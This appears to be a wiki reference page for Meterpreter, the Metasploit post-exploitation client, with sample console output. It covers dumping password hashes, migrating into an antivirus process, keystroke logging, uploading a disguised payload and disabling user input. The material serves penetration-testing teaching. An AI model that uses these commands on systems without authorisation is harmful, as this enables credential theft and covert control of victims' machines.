Metasploit/MeterpreterClient

Meterpreter > shell

=Introduction=

TODO - meterpreter introduction.

=Getting Started=

=Commands=

?
We can use ? or help to show a list of commands with brief descriptions.

background
Using the background command places the current session into the background and brings us back to the Metasploit console without terminating the session. We can begin to interact with the session again by using the sessions Metasploit command.

meterpreter > background msf exploit(handler) > sessions -l Active sessions ===============  Id  Description  Tunnel -- ---  --                                          1   Meterpreter  192.168.50.112:443 -> 192.168.50.100:1495 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter >

channel
TODO Displays information about active channels

close
TODO Closes a channel

exit
Returns to the Meterpreter console and closes the active session.

meterpreter > exit [*] Meterpreter session 1 closed. msf exploit(handler) > sessions -l Active sessions =============== No active sessions.

help
We can use ? or help to show a list of commands with brief descriptions.

interact
TODO Interacts with a channel

irb
We can start the Interactive Ruby Shell with the irb command, allowing us to use the Ruby scripting language to interact with the compromised system.

To view the API, we need to run the rdoc command from the Metasploit directory, which will create a doc/index.html file that we can open with a browser. View the Rex::Post::Meterpreter section of the API for the relevant section.

meterpreter > irb [*] Starting IRB shell [*] The 'client' variable holds the meterpreter client >> client.sys.config.sysinfo => {"OS"=>"Windows XP (Build 2600, Service Pack 2).", "Computer"=>"TARGETLAPTOP"}

migrate
Meterpreter initially runs inside the exploited process or as its own executable's process in some cases. If that process is stopped for any reason, the Meterpreter session will close, so it is good practice to migrate the session to more stable process such as Windows' explorer.exe.

The following example shows the use of a handful of commands in order to locate a process that the user will not close during his or her session. The commands are:


 * 1) ps - Show a list of running processes.
 * 2) getpid - Display the process Meterpreter is using, which shows an EXE payload meter-443.exe.
 * 3) migrate pid - Move Meterpreter to a new process ID number, where we request the McAfee agent.
 * 4) getpid - Display the new process Meterpreter is using, which we verify is the McAfee agent process.

meterpreter > ps Process list ============    PID   Name                      Path ---                                                                                           220   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe 292  RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe 484  WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe 492  smss.exe                  \SystemRoot\System32\smss.exe 592  winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe 636  services.exe              C:\WINDOWS\system32\services.exe 648  lsass.exe                 C:\WINDOWS\system32\lsass.exe 804  svchost.exe               C:\WINDOWS\system32\svchost.exe 956  svchost.exe               C:\WINDOWS\System32\svchost.exe 1404 spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe 1432 Explorer.EXE              C:\WINDOWS\Explorer.EXE 1536 mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe 1616 RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe 1692 meter-443.exe         C:\Documents and Settings\Administrator\Desktop\shared\meter-443.exe 1848 McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe 1860 mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe 1884 mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe 1996 mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe 3076 wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe 3320 wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe 3424 mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe 4032 mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe meterpreter > getpid Current pid: 1692 meterpreter > migrate 1536 [*] Migrating to 1536... [*] Migration completed successfully. meterpreter > ps Process list ============    PID   Name                      Path ---                                                                                  220   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe 292  RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe 484  WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe 492  smss.exe                  \SystemRoot\System32\smss.exe 592  winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe 636  services.exe              C:\WINDOWS\system32\services.exe 648  lsass.exe                 C:\WINDOWS\system32\lsass.exe 744  taskmgr.exe               C:\WINDOWS\system32\taskmgr.exe 804  svchost.exe               C:\WINDOWS\system32\svchost.exe 956  svchost.exe               C:\WINDOWS\System32\svchost.exe 1404 spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe 1432 Explorer.EXE              C:\WINDOWS\Explorer.EXE 1536 mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe 1616 RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe 1848 McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe 1860 mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe 1884 mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe 1996 mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe 3076 wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe 3320 wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe 3424 mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe 4032 mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe meterpreter > getpid Current pid: 1536

quit
Returns to the Meterpreter console and closes the active session.

meterpreter > quit [*] Meterpreter session 1 closed. msf exploit(handler) > sessions -l Active sessions =============== No active sessions.

read
TODO Reads data from a channel

run
We can execute a Meterpreter script using the run command. If no path is specified, Meterpreter will search for the script in the scripts/meterpreter/ directory.

In the following example we are running the scripts/meterpreter/scraper.rb script, which pulls some basic information from the target. The information is logged to the ~/.msf3/logs/scraper directory.

meterpreter > run scraper.rb [*] New session on 192.168.50.100:1548... [*] Gathering basic system information... [*] Dumping password hashes... [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:\DOCUME~1\Administrator\LOCALS~1\Temp\xHzyoaiW.reg) [*] Cleaning HKCU [*] Exporting HKLM [*] Downloading HKLM (C:\DOCUME~1\Administrator\LOCALS~1\Temp\JYCDjVMU.reg) [*] Cleaning HKLM [*] Exporting HKCC [*] Downloading HKCC (C:\DOCUME~1\Administrator\LOCALS~1\Temp\uEATxCej.reg) [*] Cleaning HKCC [*] Exporting HKCR [*] Downloading HKCR (C:\DOCUME~1\Administrator\LOCALS~1\Temp\guYOZCzT.reg) [*] Cleaning HKCR [*] Exporting HKU [*] Downloading HKU (C:\DOCUME~1\Administrator\LOCALS~1\Temp\ZNfDGqdB.reg) [*] Cleaning HKU [*] Completed processing on 192.168.50.100:1548...

use
For additional commands and functionality we can load Meterpreter extensions with the use command.

In the following example, we would like to use the hashdump command to retrieve password hashes from the target. By using the use priv command we can load the extension that gives us the hashdump command. We can verify this by using ? to list our available commands.

meterpreter > use -l stdapi sniffer incognito priv espiameterpreter > use priv Loading extension priv...success. meterpreter > ? Priv: Password database Commands ================================    Command       Description ---      ---                                  hashdump      Dumps the contents of the SAM database Priv: Timestomp Commands ========================    Command       Description ---      ---                           timestomp     Manipulate file MACE attributes

write
TODO Writes data to a channel

cat
The cat command displays the contents of a single file. As of the time of this writing, the command will throw an error when trying to read an emtpy file.

meterpreter > cat passwords.txt harleydavidson password kidsbirthday

cd
To change directory the cd command is used.

The command will accept both back and forward slashes somewhat interchangeably, though using a forward slash seems to work more frequently. "." and ".." are used to access the current and parent directory, respectively, and double-quotes can be used to access directories with spaces in the names.

meterpreter > pwd C:\ meterpreter > cd /"Program Files"/"Internet Explorer" meterpreter > pwd C:\Program Files\Internet Explorer meterpreter > cd ../../"documents and settings"/Administrator/Desktop/ C:\Documents and Settings\Administrator\Desktop

download
When we need to retrieve a file from the target we use the download command, which transfers the specified file into our local working directory. In the event that we need to recursively download an entire directory, we use the download -r command.

meterpreter > download users.txt [*] downloading: users.txt -> users.txt [*] downloaded : users.txt -> users.txt

edit
To edit a file using our default text editor we use the edit command. Behind the scenes, Meterpreter will download a copy of the file to a temp directory, then upload the new file when the edit is complete.

meterpreter > edit users.txt

getlwd
We can show the current working directory on our local machine by using getlwd (get local working directory), or by using the alias lpwd (local print working directory).

meterpreter > getlwd /home/myusername/Desktop/metasploit meterpreter > lpwd /home/myusername/Desktop/metasploit

getwd
We can show the current working directory on the exploited machine by using getwd (get working directory), or by using the alias pwd (print working directory).

meterpreter > getwd C:\Program Files\Internet Explorer meterpreter > pwd C:\Program Files\Internet Explorer

lcd
To change the local directory we use the lcd command.

The command only accepts arguments in the same way as your operating system's cd command, so refer to your system's documentation for specific instructions. The following example shows lcd on a Linux system.

meterpreter > lpwd /home/myusername/Desktop/metasploit meterpreter > lcd ../.. meterpreter > lpwd /home/myusername meterpreter > lcd /home/andrer/Desktop/metasploit meterpreter > lpwd /home/myusername/Desktop/metasploit

lpwd
We can show the current working directory on our local machine by using lpwd (local print working directory), or by using the alias getlwd (get local working directory).

meterpreter > lpwd /home/myusername/Desktop/metasploit meterpreter > getlwd /home/myusername/Desktop/metasploit

ls
We can see both the current working directory and a detailed listing of files in that directory by using the ls command. File listings are given in a format similar to the GNU ls program.

meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop\shared =============================================================== Mode             Size   Type  Last modified                   Name -                                  40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969. 40777/rwxrwxrwx  0      dir   Wed Dec 31 18:00:00 -0600 1969  .. 100777/rwxrwxrwx 14965  fil   Wed Dec 31 18:00:00 -0600 1969  meter-443.exe 40777/rwxrwxrwx  0      dir   Wed Dec 31 18:00:00 -0600 1969  u3

mkdir
We use mkdir to make a new directory on the target system.

meterpreter > mkdir antivirus-update Creating directory: antivirus-update meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ================================================ Mode             Size     Type  Last modified                   Name -                                  40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969. 40777/rwxrwxrwx  0        dir   Wed Dec 31 18:00:00 -0600 1969  .. 40777/rwxrwxrwx  0        dir   Wed Dec 31 18:00:00 -0600 1969  antivirus-update 40777/rwxrwxrwx  0        dir   Wed Dec 31 18:00:00 -0600 1969  shared 40777/rwxrwxrwx  0        dir   Wed Dec 31 18:00:00 -0600 1969  working

pwd
We can show the current working directory on our local machine by using pwd ( print working directory), or by using the alias getwd (get working directory).

meterpreter > pwd C:\Program Files\Internet Explorer meterpreter > getwd C:\Program Files\Internet Explorer

rmdir
We can remove an empty directory with the rmdir command. The command will throw an error if the directory is not empty.

meterpreter > rmdir antivirus-update Removing directory: antivirus-update

upload
To send a file to the target system we use the upload command, using the -r switch to recursively upload directories and their contents. In the following example we are uploading a falsely named Meterpreter payload.

meterpreter > upload antivirus.exe [*] uploading : antivirus.exe -> antivirus.exe [*] uploaded  : antivirus.exe -> antivirus.exe meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop\antivirus-update ================================================================= Mode             Size   Type  Last modified                   Name -                              40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969. 40777/rwxrwxrwx  0      dir   Wed Dec 31 18:00:00 -0600 1969  .. 100777/rwxrwxrwx 10912  fil   Wed Dec 31 18:00:00 -0600 1969  antivirus.exe

ipconfig
By using the ipconfig command, or internet protocol configuration, we can view a listing of all network interfaces on the target. Viewing the results for ipconfig is most useful for determining to which networks the target is directly connected.

For example, looking at the following we can see that the target is connected to the 192.168.50.0/24 network, with an internal address of 192.168.50.100.

meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask    : 255.0.0.0 National Semiconductor DP83815-Based PCI Fast Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0b:cd:30:db:0a IP Address : 192.168.50.100 Netmask    : 255.255.255.0

portfwd
Forward a local port to a remote service

route
View and modify the routing table

execute
Execute a command

To execute a command you need to use execute "-f" for file "cmd.exe" application

This will be executed in the background. To check this type ps

execute -f cmd.exe 54124---> process id

getpid
Get the current process identifier

getuid
Get the user that the server is running as

kill
Terminate a process

ps
The ps command lists the running processes, and is an important command for a couple reasons. First, it is a good idea for us to be aware of applications and services running on the target in order to have awareness of the system. Secondly, Meterpreter initially runs inside the exploited process or as its own executable's process in some cases. If that process is stopped for any reason, the Meterpreter session will close, so it is good practice to migrate the session to more stable process such as Windows' explorer.exe.

meterpreter > ps Process list ============    PID   Name                      Path ---                                                                                  284   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe 424  RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe 492  smss.exe                  \SystemRoot\System32\smss.exe 592  winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe 612  WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe 636  services.exe              C:\WINDOWS\system32\services.exe 648  lsass.exe                 C:\WINDOWS\system32\lsass.exe 804  svchost.exe               C:\WINDOWS\system32\svchost.exe 876  NOTEPAD.EXE               C:\WINDOWS\system32\NOTEPAD.EXE 964  svchost.exe               C:\WINDOWS\System32\svchost.exe 1348 spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe 1464 Explorer.EXE              C:\WINDOWS\Explorer.EXE 1540 mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe 1612 RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe 1840 McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe 1852 mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe 1876 mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe 1928 mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe 1952 mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe 3028 wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe 3168 wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe 3240 mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe

reboot
By running the reboot command, we will restart the target system.

meterpreter > reboot Rebooting...

reg
Modify and interact with the remote registry

rev2self
Calls RevertToSelf on the remote machine

shutdown
Using the shutdown command will shut off the target system.

meterpreter > shutdown Shutting down...

sysinfo
During the post-exploitation phase, one of the earliest commands that we should run is the sysinfo command. Running this command will give us the Computer Name and OS version, which often offers a clue to the purpose of the target system.

meterpreter > sysinfo Computer: TARGETLAPTOP OS     : Windows XP (Build 2600, Service Pack 2).

enumdesktops
TODO List all accessible desktops and window stations

idletime
Using the idletime command will return the length of time that the target system's user has been idle.

meterpreter > idletime User has been idle for: 51 secs

keyscan_dump
We can capture the keyboard input of the target using the keyscan series of commands. The keyscan_start and keyscan_stop commands will begin and end recording keystrokes respectively, while the keyscan_dump command displays all recorded keystrokes on our client.

meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... This text is actually being typed into the target's keyboard. meterpreter > keyscan_stop Stopping the keystroke sniffer...

keyscan_start
We can capture the keyboard input of the target using the keyscan series of commands. The keyscan_start and keyscan_stop commands will begin and end recording keystrokes respectively, while the keyscan_dump command displays all recorded keystrokes on our client.

meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... This text is actually being typed into the target's keyboard. meterpreter > keyscan_stop Stopping the keystroke sniffer...

keyscan_stop
We can capture the keyboard input of the target using the keyscan series of commands. The keyscan_start and keyscan_stop commands will begin and end recording keystrokes respectively, while the keyscan_dump command displays all recorded keystrokes on our client.

meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... This text is actually being typed into the target's keyboard. meterpreter > keyscan_stop Stopping the keystroke sniffer...

setdesktop
TODO Move to a different workstation and desktop

uictl
Using the uictl command we have the ability to disable keyboard and mouse input on the target.

meterpreter > uictl disable mouse Disabling mouse... meterpreter > uictl enable mouse Enabling mouse... meterpreter > uictl disable keyboard Disabling keyboard... meterpreter > uictl enable keyboard Enabling keyboard...